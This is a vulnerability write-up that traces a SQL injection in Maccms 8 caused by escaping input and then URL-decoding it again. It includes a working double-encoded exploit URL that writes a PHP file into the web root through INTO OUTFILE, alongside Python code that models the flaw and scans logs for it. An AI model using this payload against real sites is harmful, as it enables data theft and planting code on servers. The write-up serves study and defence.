Vulnerability author: 路人甲
We start at the entry file, index.php:
[php]
$m = be('get','m');                                        // the route string, e.g. "gbook-show-wd-xxx"
if(strpos($m,'.')){ $m = substr($m,0,strpos($m,'.')); }   // strip a ".html"-style suffix
$par = explode('-',$m);                                    // action, method, then key/value pairs
$parlen = count($par);
$ac = $par[0];
if(empty($ac)){ $ac='vod'; $method='index'; }
$colnum = array("id","pg","yaer","typeid","classid");    // parameters treated as integers
if($parlen>=2){
    $method = $par[1];
    for($i=2;$i<$parlen;$i+=2){
        // numeric keys are cast with intval(); every other value is urldecoded a second time
        $tpl->P[$par[$i]] = in_array($par[$i],$colnum) ? intval($par[$i+1]) : urldecode($par[$i+1]);
    }
}
if($tpl->P['pg']<1){ $tpl->P['pg']=1; }
[/php]
Following the be() function, its code is:
[php]
function be($mode,$key,$sp=',')
{
    ini_set("magic_quotes_runtime", 0);
    $magicq= get_magic_quotes_gpc();   // if magic quotes already escaped the input, do not escape again
    switch($mode)
    {
        case 'post':
            $res=isset($_POST[$key]) ? $magicq?$_POST[$key]:@addslashes($_POST[$key]) : '';
            break;
        case 'get':
            // index.php takes this branch: the $_GET value is escaped with addslashes as-is
            $res=isset($_GET[$key]) ? $magicq?$_GET[$key]:@addslashes($_GET[$key]) : '';
            break;
        case 'arr':
            $arr =isset($_POST[$key]) ? $_POST[$key] : '';
            if($arr==""){
                $value="0";
            }
            else{
                for($i=0;$i<count($arr);$i++){
                    $res=implode($sp,$arr);
                }
            }
            break;
        default:
            $res=isset($_REQUEST[$key]) ? $magicq ? $_REQUEST[$key] : @addslashes($_REQUEST[$key]) : '';
            break;
    }
    return $res;
}
[/php]
Here special characters go through addslashes. But if we pass %2527, what arrives at this point is %27, which the escaping leaves alone. Stepping back out to the caller, we find the curious part; wherever something odd happens, there is bound to be an odd piece of code behind it:
[php]
for($i=2;$i<$parlen;$i+=2){
    $tpl->P[$par[$i]] = in_array($par[$i],$colnum) ? intval($par[$i+1]) : urldecode($par[$i+1]);
}
[/php]
See that? The value is urldecoded once more here, so it should be clear how this CMS can be bypassed. Next we pick a file to look at, gbook.php:
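To make the ordering problem concrete, here is an added Python model of the parse path quoted above. It is example code written for this note, not Maccms code. It reproduces be() with magic quotes off (addslashes over the whole string) followed by the per-value urldecode, and beside it the hardened ordering in which each value is decoded exactly once and escaped afterwards. The input is the value as PHP already placed it in $_GET['m'], i.e. after the web server's single decoding, so a %2527%2529 prefix arrives as %27%29. The names parse_m, escaping_intact, addslashes and intval are assumptions of this example. Escaping only narrows the window; the durable fix is to hand these values to the database through prepared statements.

```python
import re
from urllib.parse import unquote

# Parameters that index.php casts with intval() (the $colnum array above).
COLNUM = {"id", "pg", "yaer", "typeid", "classid"}


def addslashes(s):
    """Python model of PHP addslashes(): a backslash before ' " \\ and NUL."""
    return re.sub(r"([\\'\"\x00])", r"\\\1", s)


def intval(s):
    """Python model of PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def parse_m(get_m, decode_before_escape=False):
    """Model of how index.php turns $_GET['m'] into $tpl->P.

    get_m is the value PHP already placed in $_GET['m'] (decoded once by
    the web server). With decode_before_escape=False the original order is
    reproduced: be() applies addslashes to the whole string, then each
    value is urldecoded, so %27 becomes a bare quote after escaping.
    With decode_before_escape=True (hardened order, assumed here) a value
    is urldecoded exactly once and escaped after that.
    """
    m = get_m if decode_before_escape else addslashes(get_m)
    dot = m.find(".")
    if dot > 0:  # PHP strpos() is falsy for both "not found" and offset 0
        m = m[:dot]
    par = m.split("-")
    ac = par[0] or "vod"
    method = par[1] if len(par) >= 2 else "index"
    p = {}
    for i in range(2, len(par), 2):
        key = par[i]
        val = par[i + 1] if i + 1 < len(par) else ""  # undefined index -> null -> ""
        if key in COLNUM:
            p[key] = intval(val)
        elif decode_before_escape:
            p[key] = addslashes(unquote(val))
        else:
            p[key] = unquote(val)
    if p.get("pg", 0) < 1:
        p["pg"] = 1
    return {"ac": ac, "method": method, "P": p}


def escaping_intact(value):
    """True if every quote in value is preceded by an unescaped backslash.

    False for a string parameter means the escaping that be() applied no
    longer protects the value that reaches the query.
    """
    escaped = False
    for ch in value:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch in "'\"":
            return False
    return True


# Constructed input: what $_GET['m'] holds once the web server has decoded
# a "gbook-show-wd-ss11s%2527%2529" prefix a single time.
GET_M = "gbook-show-wd-ss11s%27%29"

if __name__ == "__main__":
    v = parse_m(GET_M)
    h = parse_m(GET_M, decode_before_escape=True)
    print("escape-then-decode:", repr(v["P"]["wd"]), "intact:", escaping_intact(v["P"]["wd"]))
    print("decode-then-escape:", repr(h["P"]["wd"]), "intact:", escaping_intact(h["P"]["wd"]))
```

In the original order the wd value comes out as ss11s') with the quote unescaped; in the hardened order the same input comes out as ss11s\') because the escaping is applied to the fully decoded value and nothing decodes it again afterwards.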
[php]
$tpl->P['cn'] = 'gbook'.$tpl->P['pg'];
//echoPageCache($tpl->P['cp'],$tpl->P['cn']);
$tpl->H = loadFile(MAC_ROOT."/template/".$MAC['site']['templatedir']."/".$MAC['site']['htmldir']."/home_gbook.html");
$db = new AppDb($MAC['db']['server'],$MAC['db']['user'],$MAC['db']['pass'],$MAC['db']['name']);
$tpl->mark();
$tpl->H = str_replace("{maccms:gbookverify}", $MAC['other']['gbookverify'] ,$tpl->H);
if(strpos($tpl->H,'{maccms:count_gbook_all}')){
    $tpl->H = str_replace("{maccms:
[/php]
There is a mark() call here; following it in, we find that it contains a function performing a SQL operation:
[php]
$this->markname = $matches1[1][$i];
$this->markpar = $matches1[2][$i];
$this->markdes = $matches1[3][$i];
$this->mark_sql();
switch($this->markname)
{
[/php]
Following mark_sql() in turn, we see that it performs a SELECT query. Next we construct the SQL statement. Since the CMS uses pseudo-static URLs, all of which are dispatched through index.php:
URL:
[php]
http://192.168.10.70/maccms8_mfb_/maccms8_mfb/index.php?m=gbook-show-wd-ss11s') union select 1,2,3,user(),version(),"<?php phpinfo()?>",NULL,NULL,NULL into outfile 'E:/wamp/www/maccms8_mfb_/maccms8_mfb/cache/userinfo'#ORDER BY g_time desc limit 0,10
[/php]
Following the analysis above, we URL-encode the part after m twice:
[php]
http://192.168.10.70/maccms8_mfb_/maccms8_mfb/index.php?m=gbook-show-wd-ss11s%2527%2529%2520union%2520select%25201%252C2%252C3%252Cuser%2528%2529%252Cversion%2528%2529%252C%2522%253C%253Fphp%2520phpinfo%2528%2529%253F%253E%2522%252CNULL%252CNULL%252CNULL%2520into%2520outfile%2520%2527E%253A%252fwamp%252fwww%252fmaccms8_mfb_%252fmaccms8_mfb%252fcache%252fuserinfo%2527%2523ORDER%2520BY%2520g_time%2520desc%2520limit%25200%252C10
[/php]
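The double encoding is also what makes this pattern visible to the defender: a value that decodes to different text a second time, and whose second decoding produces quotes, parentheses or comment characters, only means something to code that decodes twice. Below is an added Python scanner that applies that test to web-server access-log lines; it is example code written for this note, not part of the original post or of Maccms. The log lines are constructed for the example, and the names scan_log and double_decoded_metachars are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters that matter once a value reaches a SQL string or a file path.
METACHARS = set("'\"\\;#()")

# Constructed access-log lines for this example (not from the original post).
# The first is an ordinary UTF-8 search; the second carries the post's
# double-encoded prefix in the m parameter.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2015:10:00:00 +0800] "GET /index.php?m=vod-search-wd-%E5%8A%A8%E7%94%BB HTTP/1.1" 200 5120',
    '192.0.2.20 - - [01/Jan/2015:10:00:05 +0800] "GET /index.php?m=gbook-show-wd-ss11s%2527%2529%2520union HTTP/1.1" 200 742',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def double_decoded_metachars(once_decoded):
    """Metacharacters that appear only after a SECOND percent-decoding.

    once_decoded is a query value as the server hands it to the application
    (one decoding already applied, which is what parse_qsl does). Anything
    new that shows up after decoding it again exists only for code that,
    like the urldecode() in index.php, decodes a second time.
    """
    twice = unquote(once_decoded)
    if twice == once_decoded:
        return set()
    return (set(twice) - set(once_decoded)) & METACHARS


def scan_log(lines):
    """Return (client, parameter, sorted metachars) for each suspicious value."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        query = urlsplit(m.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            hits = double_decoded_metachars(value)
            if hits:
                findings.append((client, key, sorted(hits)))
    return findings


if __name__ == "__main__":
    for client, key, chars in scan_log(SAMPLE_LOG):
        print(f"{client}: parameter {key!r} gains {chars} on second decode")
```

Legitimate values that merely contain a literal percent sign (a "100%25" price, say) do decode differently the second time, but produce no new metacharacter and are therefore not reported; the check fires only when the second decoding introduces characters that change the meaning of a query or a path.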
After sending the request, the result is as shown in the figure:
Then we visit the file we generated:
The site is well built; keep on learning.